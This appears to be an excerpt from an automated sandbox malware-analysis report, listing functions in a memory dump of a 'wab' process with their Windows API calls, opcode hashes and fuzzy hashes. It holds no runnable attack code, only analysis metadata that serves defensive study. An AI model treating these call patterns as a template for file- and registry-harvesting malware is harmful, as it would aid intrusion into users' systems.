                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                                                                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2136311172-0
